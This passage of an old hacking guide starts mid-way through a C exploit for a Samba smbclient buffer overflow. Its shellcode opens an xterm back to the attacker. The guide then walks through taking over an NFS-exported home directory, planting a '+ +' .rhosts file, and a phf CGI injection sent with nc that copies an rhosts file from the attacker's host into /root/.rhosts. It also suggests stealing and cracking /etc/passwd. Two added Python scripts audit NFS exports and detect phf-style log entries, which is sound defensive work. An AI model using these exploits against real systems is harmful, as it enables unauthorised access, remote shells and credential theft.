cc !\n"); printf(" = VICTIME for get the netbios name use ADMnmbname o r ADMhack\n"); printf(" = the sploit send a xterm to your machine heh \n"); printf("option:\n"); printf("[buff size] = the size of the buffer to send default is 3081 try +1 - 1 to a plage of +10 -10\n"); printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n"); printf(" HaVe Fun\n"); exit(0); } sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[3]); shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1); bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1); printf("4 byte = 0x%x\n",shellcode[4]); printf("5 byte = 0x%x\n",bla[2]); strcat(shellcode,cmd); strcat(shellcode,arg1); strcat(shellcode,bla); strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx"); // printf("%s\n",shellcode); strcpy(ipz,argv[1]); /* haha u can overflow my sploit :) */ strcpy(netbios_name,argv[2]); if (argc > 4) bsize = atoi(argv[4]); if (argc > 5) offset = atoi(argv[5]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name); addr = 0xbffffff0 - offset ; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/4; i++) buff[i] = NOP; ptr = buff + ((bsize/4) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL); } ------------------------------------------[END]-------------------------------- ----------------- Now, dont you wish you had samba ?????????? :) Well, this about covers most of it, but it covers only the exploit part... For the rest, i use my very very old guide, to explain the nfs problems && phf.. bcoz i got tired of writting... sooooooooooooo ... here it is.. 
:) The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search another way in. What I was trying to do was to exploit an old security problem in most SunOS versions that could allow a remote attacker to add a .rhosts to a user's home directory... (That was possible if the site had exported their home directory.) Let's see what happens...

mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr    victim2.site.com
/home   (everyone)
/cdrom  (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.

mysite:~#id
uid=0 euid=0
mysite:~#whoami
root
mysite:~#echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh because bash usually leaves a (Damn!) .bash_history and you might forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers    *snifsnif*
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/

So we own this guy's home directory...
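The export list is the whole story here: /home is exported to (everyone), so any host can mount it, and classic NFS (AUTH_SYS) simply believes the numeric uid the client presents, which is why a locally created uid 102 lands inside rapper's directory. The following audit script is an added example, not code from the original article: it parses `showmount -e` output as printed by Linux nfs-utils and the server-side /etc/exports format, and flags exports that are open to any host. Hostnames, paths and both sample listings are constructed.

```python
"""NFS export audit: flag exports that any host may mount.

Added example, not code from the original article. Parses the client list
printed by `showmount -e` (one export per line: path, then allowed clients)
and the server-side /etc/exports format, and reports entries open to the
world. All sample data below is constructed.
"""
from dataclasses import dataclass, field

# Constructed sample in the shape of `showmount -e` output on Linux.
SAMPLE_SHOWMOUNT = """\
Export list for victim1.site.com:
/usr   victim2.site.com
/home  (everyone)
/cdrom (everyone)
/opt   *.site.com,10.0.0.0/24
"""

# Constructed sample /etc/exports. The /home entry is the classic mistake:
# a space before "(rw)" makes the options apply to every host, not to one.
SAMPLE_EXPORTS_FILE = """\
# exports file
/usr   victim2.site.com(ro,root_squash)
/home  (rw)
/cdrom *(ro)
/srv   trusted.site.com(rw,no_root_squash)
"""

WORLD_CLIENTS = {"(everyone)", "everyone", "*"}


@dataclass
class Export:
    path: str
    clients: list = field(default_factory=list)

    def is_world_mountable(self):
        # No client list at all, or a world wildcard, means anyone can mount.
        return not self.clients or any(c in WORLD_CLIENTS for c in self.clients)


def parse_showmount(text):
    """Parse `showmount -e` output into Export records."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        clients = [c.strip() for c in rest.split(",") if c.strip()]
        exports.append(Export(path, clients))
    return exports


def world_mountable(exports):
    """Paths from an export list that any host can mount."""
    return [e.path for e in exports if e.is_world_mountable()]


def unrestricted_exports_file_entries(text):
    """Return (path, reason) for /etc/exports lines that trust the world.

    exports(5) syntax is "/path host(opts) host2(opts)". A token with no
    host part ("(rw)") or the host "*" exports to everybody; no_root_squash
    additionally lets a remote root act as root on the export.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        if not rest:
            findings.append((path, "no client list"))
            continue
        for token in rest.split():
            host = token.split("(", 1)[0]
            if host in ("", "*"):
                findings.append((path, f"world entry {token!r}"))
            if "no_root_squash" in token:
                findings.append((path, f"no_root_squash on {host!r}"))
    return findings


if __name__ == "__main__":
    for path in world_mountable(parse_showmount(SAMPLE_SHOWMOUNT)):
        print(f"[showmount] {path} is mountable by any host")
    for path, reason in unrestricted_exports_file_entries(SAMPLE_EXPORTS_FILE):
        print(f"[exports]   {path}: {reason}")
```

Run against real `showmount -e` output, `world_mountable()` is the list to worry about; on the server, the same check over /etc/exports catches the "/path (rw)" mistake before a client ever sees it.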
mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com. SunOs ver....(crap).
victim1:~$

Well, now be very careful with the web exploits, because they usually get logged. (not usually, always.. :)) Besides, if you really wanna get a source file from /cgi-bin/ use this syntax:

lynx http://www.victim1.com//cgi-bin/finger...

that should work on some systems.. :) If you don't wanna do that, then do a:

mysite:~>echo "+ +" > /tmp/rhosts
mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts" | nc -v - 20 victim1.site.com 80
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

or instead of rcp-ing, try cat-ing the /etc/passwd file, and then cracking it, to get passwords... And so on......
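The text is right that web exploits get logged: the phf request above lands in the access log verbatim, and what gives it away is the %0a, which decodes to a newline and turns a finger lookup into a command line. The script below is an added example (not from the original article) of the defender's half of that: it parses Common Log Format lines, decodes each /cgi-bin/ query and flags any request carrying a CR or LF in the decoded query, which generalizes beyond phf to any CGI with the same filtering gap. It also audits .rhosts / hosts.equiv content for the "+" wildcard that both the NFS and the phf paths end with. Log lines, addresses and the rhosts sample are constructed.

```python
"""Detect phf-style CGI injection in access logs; audit rhosts wildcards.

Added example, not code from the original article. Log lines and rhosts
content below are constructed; addresses are documentation ranges.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed Common Log Format lines. The second and fourth are attacks:
# the %0a / %0d%0a in the query decode to a newline inside the CGI argument.
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [20/Oct/1997:18:57:01 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
203.0.113.5 - - [20/Oct/1997:18:58:12 -0500] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/id HTTP/1.0" 200 88
203.0.113.5 - - [20/Oct/1997:18:58:40 -0500] "GET /index.html HTTP/1.0" 200 2048
192.0.2.9 - - [20/Oct/1997:19:01:03 -0500] "GET /cgi-bin/finger?user=x%0d%0a/bin/ls HTTP/1.0" 404 120
"""

# Constructed .rhosts content; "+" in the host or user field means "anyone".
SAMPLE_RHOSTS = """\
# trusted hosts
+ +
friend.example.com bob
+ bob
host2.example.com +
"""

CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_clf(line):
    """Split one Common Log Format line into its fields, or None if malformed."""
    m = CLF.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Return a reason string if the request target looks like CGI injection.

    Only /cgi-bin/ paths are considered; the signal is a CR or LF surviving
    URL-decoding of the query string, which no legitimate form submits.
    """
    parts = urlsplit(target)
    path = parts.path.lower()
    if not path.startswith("/cgi-bin/"):
        return None
    decoded = unquote(parts.query)
    if "\n" in decoded or "\r" in decoded:
        return f"newline injected into query of {path}"
    return None


def detect_cgi_injection(lines):
    """Return (client, target, reason) for log lines that look like phf-style abuse."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if not rec:
            continue
        reason = classify_request(rec["target"])
        if reason:
            hits.append((rec["client"], rec["target"], reason))
    return hits


def rhosts_wildcards(text):
    """Return the lines of a .rhosts / hosts.equiv file that trust a wildcard.

    Each line is 'host [user]'; a '+' in either field means 'any'.
    """
    risky = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line and any(f == "+" for f in line.split()):
            risky.append(line)
    return risky


if __name__ == "__main__":
    for client, target, reason in detect_cgi_injection(SAMPLE_ACCESS_LOG.splitlines()):
        print(f"[web]    {client} {target}: {reason}")
    for line in rhosts_wildcards(SAMPLE_RHOSTS):
        print(f"[rhosts] wildcard trust: {line!r}")
```

The benign phf lookup on the first line is not flagged, and the HTTP status is deliberately ignored: the finger request returned 404 and is still worth an alert, since the attempt, not the outcome, is what the log records.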